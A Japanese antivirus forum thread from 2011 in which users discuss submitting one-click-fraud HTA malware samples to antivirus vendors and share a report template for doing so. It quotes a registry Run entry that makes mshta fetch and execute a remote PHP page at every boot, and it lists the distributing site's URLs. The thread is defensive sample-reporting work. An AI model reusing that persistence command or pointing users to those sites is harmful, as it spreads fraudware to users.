Author Topic: ADULT について  (Read 4968 times)

0 Members and 1 Guest are viewing this topic.

flow_my_tears_1987

  • Guest
ADULT について
« on: November 06, 2011, 02:49:55 PM »
はじめましてワンクリックウェアなどの送信しています物です。
http://www.anteater-movies.com/

File name 「29ce.hta」
http://www.virustotal.com/file-scan/report.html?id=d9c1a6bb2e101ef536bf73e7461fc791344260a7024b2d082f52d4143e128f20-1319292870

C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [www.high-quality-movie.com] mshta http://www.anteater-movies.com/regist2.php

送信しても対応しません。カスペ以外対応しません。次の日アクセスすると4桁が変わってます
また送信しても反応しません

ADULTは週ごとに新しいurlが生まれます。

Offline NON

  • Japanese User
  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5127
  • Whatever will be, will be.
Re: ADULT について
« Reply #1 on: November 06, 2011, 04:28:37 PM »
こんにちは flow_my_tears_1987 さん

送信しても対応されないとのことですが、送信はメールとチェストのどちらから行われているのでしょうか?
経験上、メールでの送信の方が対応率は高い気がしますので、もしチェストからの送信である場合はメールで送信してみてください。
その際はファイルをZIPで圧縮し、"virus"とパスワードをかけたものを添付してください。

文面は、普段使っているテンプレートまんまですがこんな感じでどうでしょうか。
ファイル名やVirustotalのURL等は毎回書き換える必要がありますが。

送信先: virus@avast.com
件名:
Code: [Select]
Malware (one-click porn regist ad)本文:
Code: [Select]
Hello.

Probably, attached files are infected with threat.
Please examine this.
Details are as follows.
Thank you for your hard work!

<Attached file info>
Decompression password : virus
File name : 29ce.zip
In file :
29ce.hta

<Where did I get this?>
http://www.anteater-movies.com/
http://www.anteater-movies.com/confilm2.php

<Additional Info>
After executing this hta file, porn-site ad is displayed every boot.
The ad says "Thanks for registering our porn site. You have to pay service charge within 3 days."
Of course, we don't have to pay this.

<OS>
Windows

<Country>
Japan

<Other detectable software>
Only Kaspersky.
http://www.virustotal.com/file-scan/report.html?id=d9c1a6bb2e101ef536bf73e7461fc791344260a7024b2d082f52d4143e128f20-1319292870

それから、flow_my_tears_1987 さんのメールアドレスが表示設定になっています。
1. 右上の"PROFILE"をクリック
2. 左側の"Account Related Settings"を開く
3. "Hide email address from public?"にチェックを入れる
4. 一番下の"Change Profile"を押す
の手順で、メールアドレス非表示の設定を行われることをお勧めします。
Main: Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium Beta(Icarus) / Comodo Firewall (testing again)
Mobile: Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

Avast の設定について解説しています。よろしければご覧ください。

flow_my_tears_1987

  • Guest
Re: ADULT について
« Reply #2 on: November 07, 2011, 02:01:10 AM »
ありがとうございます。
巡回して対応していないhtaをメールで送っております。
まぁ、最近リカバリーして手抜きで圧縮、パスなしで
avast、bitdefendefに送ってましたが、
対応してもらっていましたが、再度送って見ます。

同じサイトから落としてみました。
46c2.hta
http://www.virustotal.com/file-scan/report.html?id=8a58a5e6149ce50b843ee612add4c57aa3972f2e33b54d483f9b593020425f1d-1320626255

win xp sp3
avast 6.1.1289
webrep なし 自動サンドボックス 無効
trafficlight by bitdefender
pc tools firewall plus
returnil